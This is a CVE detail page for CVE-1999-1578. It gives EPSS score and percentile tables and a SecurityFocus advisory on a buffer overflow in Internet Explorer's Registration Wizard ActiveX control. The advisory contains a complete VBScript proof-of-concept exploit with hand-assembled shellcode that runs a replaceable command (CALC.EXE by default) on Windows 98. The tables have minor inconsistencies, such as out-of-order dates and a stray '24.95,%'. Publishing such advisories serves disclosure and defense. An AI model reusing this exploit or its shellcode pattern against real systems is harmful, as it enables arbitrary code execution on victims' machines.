CVE-1999-1578 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	13.53%	–	–
2022-04-03	–	–	13.53%	–	–
2022-07-17	–	–	13.53%	–	–
2023-03-12	–	–	–	0.2%	–
2023-08-06	–	–	–	0.2%	–
2023-08-13	–	–	–	0.24%	–
2023-09-17	–	–	–	0.24%	–
2024-02-11	–	–	–	0.24%	–
2024-03-31	–	–	–	0.21%	–
2024-06-02	–	–	–	0.21%	–
2024-06-02	–	–	–	0.21%	–
2024-11-17	–	–	–	0.21%	–
2024-12-22	–	–	–	0.55%	–
2025-02-16	–	–	–	0.55%	–
2025-01-19	–	–	–	0.55%	–
2025-02-16	–	–	–	0.55%	–
2025-03-18	–	–	–	–	21.19%
2025-03-30	–	–	–	–	20.64%
2025-04-10	–	–	–	–	24.95%
2025-04-10	–	–	–	–	24.95,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	91%
2022-04-03	95%
2022-07-17	96%
2023-03-12	57%
2023-08-06	58%
2023-08-13	61%
2023-09-17	62%
2024-02-11	61%
2024-03-31	58%
2024-06-02	59%
2024-06-02	59%
2024-11-17	6%
2024-12-22	77%
2025-02-16	78%
2025-01-19	77%
2025-02-16	78%
2025-03-18	95%
2025-03-30	95%
2025-04-10	96%
2025-04-10	96%

Microsoft Internet Explorer 4.1/5.0 for Windows 95/Windows NT 4,Windows 98 Registration Wizard Buffer Overflow Vulnerability source: https://www.securityfocus.com/bid/671/info There is a buffer overflow in the Internet Explorer Registration Wizard control (regwizc.dll). This control is marked 'Safe for Scripting' . Arbitrary commands may be executed if the control is run in a malicious manner. REGWIZC The Registration Wizard control used by Microsoft to register MS products also contains a buffer overrun in the 'InvokeRegWizard' method. When called with a long string, pre-pended with '/i', we can gain control of the RET address and exploit the control in a similar manner as the PDF control. This exploit will cause a 'Regwiz.log' file to be created in the temporary directory, and once again will execute CALC.EXE and terminate the host. <object classid="clsid:50E5E3D1-C07E-11D0-B9FD- 00A0249F6B00" id="RegWizObj"> </object> <script language="VbScript" ><!-- msgbox("Registration Wizard Buffer Overrun" + Chr(10) + "Written by Shane Hird") expstr = "/i AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 'We overflowed to the RET point of the stack 'No NULL's allowed so ret to <JMP ESP> in Shell32 expstr = expstr & Chr(235) 'Address in SHELL32, Win98 (7FD035EB) of JMP ESP expstr = expstr & Chr(53) 'You may need to use a different address expstr = expstr & Chr(208) expstr = expstr & Chr(127) 'NOP for debugging purposes expstr = expstr + Chr(144) 'MOV EDI, ESP expstr = expstr + Chr(139) + Chr(252) 'ADD EDI, 19 (Size of code) expstr = expstr + Chr(131) + Chr(199) + Chr(25) 'PUSH EAX (Window Style EAX = 41414141) expstr = expstr + Chr(80) 'PUSH EDI (Address of command line) expstr = expstr + Chr(87) 'MOV EDX, BFFA0960 (WinExec, Win98) expstr = expstr + Chr(186) + Chr(96) + Chr(9) + Chr(250) + Chr(191) 'CALL EDX expstr = expstr + Chr(255) + Chr(210) 'XOR EAX, EAX expstr = expstr + Chr(51) + Chr(192) 'PUSH EAX expstr = expstr + Chr(80) 'MOV EDX, BFF8D4CA (ExitProcess, Win98) expstr = expstr + Chr(186) + Chr(202) + Chr(212) + Chr(248) + Chr(191) 'CALL EDX expstr = expstr + Chr(255) + Chr(210) 'Replace with any command + 0 (automatically appended) expstr = expstr + "CALC.EXE" RegWizObj.InvokeRegWizard(expstr) --></script>